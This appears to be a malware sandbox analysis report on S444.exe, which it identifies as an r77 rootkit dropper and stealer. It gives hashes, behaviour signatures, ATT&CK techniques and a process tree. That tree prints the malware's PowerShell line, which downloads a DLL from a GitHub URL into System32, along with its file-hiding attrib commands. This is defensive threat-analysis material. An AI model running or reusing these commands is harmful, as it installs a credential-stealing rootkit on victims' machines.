Overview

overview

10

Static

static

10

flash ETH v.1.exe

windows10-2004-x64

10

S444.exe

windows10-2004-x64

10

SYS.exe

windows10-2004-x64

10

USDT Flasher.exe

windows10-2004-x64

3

ss32.exe

windows10-2004-x64

10

winlogoc.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    298s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 23:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    S444.exe

  • Size

    33KB

  • MD5

    17e158e0f91dcc8168f2e416035926ed

  • SHA1

    aac8bf1174db86568aab282b8a8de953c372ef1e

  • SHA256

    bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b

  • SHA512

    383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c

  • SSDEEP

    768:WdQHdYES3hnpwEC/uc/zBaP09K737hNWhlLF:W7x8zgs9W37hMPJ

Score
10/10
r77discoveryevasionexecutionpersistenceprivilege_escalationrootkitspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

  • R77 family
    r77
  • r77

    r77 is an open-source, userland rootkit.

    rootkitr77
  • r77 rootkit payload 1 IoCs

    Detects the payload of the r77 rootkit.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

    persistenceprivilege_escalation
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\S444.exe
    "C:\Users\Admin\AppData\Local\Temp\S444.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3728
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
        3⤵
        • Sets file to hidden
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:4536
    • C:\System32\$77-System32.exe
      "C:\System32\$77-System32.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4704
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h +r "C:\System32\$77-System32.exe"
          4⤵
          • Sets file to hidden
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:3764
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Event Triggered Execution

1
T1546

AppInit DLLs

1
T1546.010

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Event Triggered Execution

1
T1546

AppInit DLLs

1
T1546.010

Defense Evasion

Hide Artifacts

2
T1564

Hidden Files and Directories

2
T1564.001

Modify Registry

1
T1112

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

1
T1012

System Information Discovery

2
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

Lateral Movement

Collection

Data from Local System

1
T1005

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\System32\$77-System32.exe
    Filesize

    33KB

    MD5

    17e158e0f91dcc8168f2e416035926ed

    SHA1

    aac8bf1174db86568aab282b8a8de953c372ef1e

    SHA256

    bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b

    SHA512

    383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c

    Download Submit

  • C:\System32\r77-x64.dll
    Filesize

    147KB

    MD5

    1b8bd653321cf3cbc786e563555fbc75

    SHA1

    5638efe0476c8c1b74c6604db419be814d1d90a0

    SHA256

    919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7

    SHA512

    bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10sajnmf.lky
    Filesize

    20KB

    MD5

    49693267e0adbcd119f9f5e02adf3a80

    SHA1

    3ba3d7f89b8ad195ca82c92737e960e1f2b349df

    SHA256

    d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

    SHA512

    b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Rot.bat
    Filesize

    229B

    MD5

    5623353a38611880912397750358a0cf

    SHA1

    1abfda3058cae5b11da3e6551fbec2eb354a25d3

    SHA256

    4b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c

    SHA512

    78b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3jzxgggp.yno.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1996-40-0x0000000005FD0000-0x0000000005FEE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1996-26-0x00000000026B0000-0x00000000026E6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1996-43-0x00000000064E0000-0x00000000064FA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1996-42-0x0000000007840000-0x0000000007EBA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/1996-28-0x0000000005120000-0x0000000005142000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1996-41-0x0000000006010000-0x000000000605C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1996-39-0x0000000005A60000-0x0000000005DB4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1996-27-0x00000000052E0000-0x0000000005908000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1996-29-0x0000000005910000-0x0000000005976000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3728-3-0x0000000005370000-0x000000000540C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3728-1-0x0000000000980000-0x000000000098E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/3728-4-0x0000000005410000-0x0000000005476000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3728-5-0x0000000074660000-0x0000000074E10000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3728-2-0x0000000005840000-0x0000000005DE4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3728-0-0x000000007466E000-0x000000007466F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3728-18-0x0000000074660000-0x0000000074E10000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4704-19-0x0000000074660000-0x0000000074E10000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4704-44-0x0000000074660000-0x0000000074E10000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4704-54-0x0000000006AE0000-0x0000000006B72000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4704-55-0x0000000006AB0000-0x0000000006ABA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4704-56-0x0000000006620000-0x000000000662E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4704-57-0x0000000006690000-0x000000000669A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4704-60-0x0000000007830000-0x00000000078C8000-memory.dmp

    Filesize

    608KB

    Download

  • memory/4704-61-0x0000000007AA0000-0x0000000007B34000-memory.dmp

    Filesize

    592KB

    Download

  • memory/4704-62-0x0000000007B90000-0x0000000007BE0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4704-63-0x0000000007BE0000-0x0000000007F34000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4704-20-0x0000000074660000-0x0000000074E10000-memory.dmp

    Filesize

    7.7MB

    Download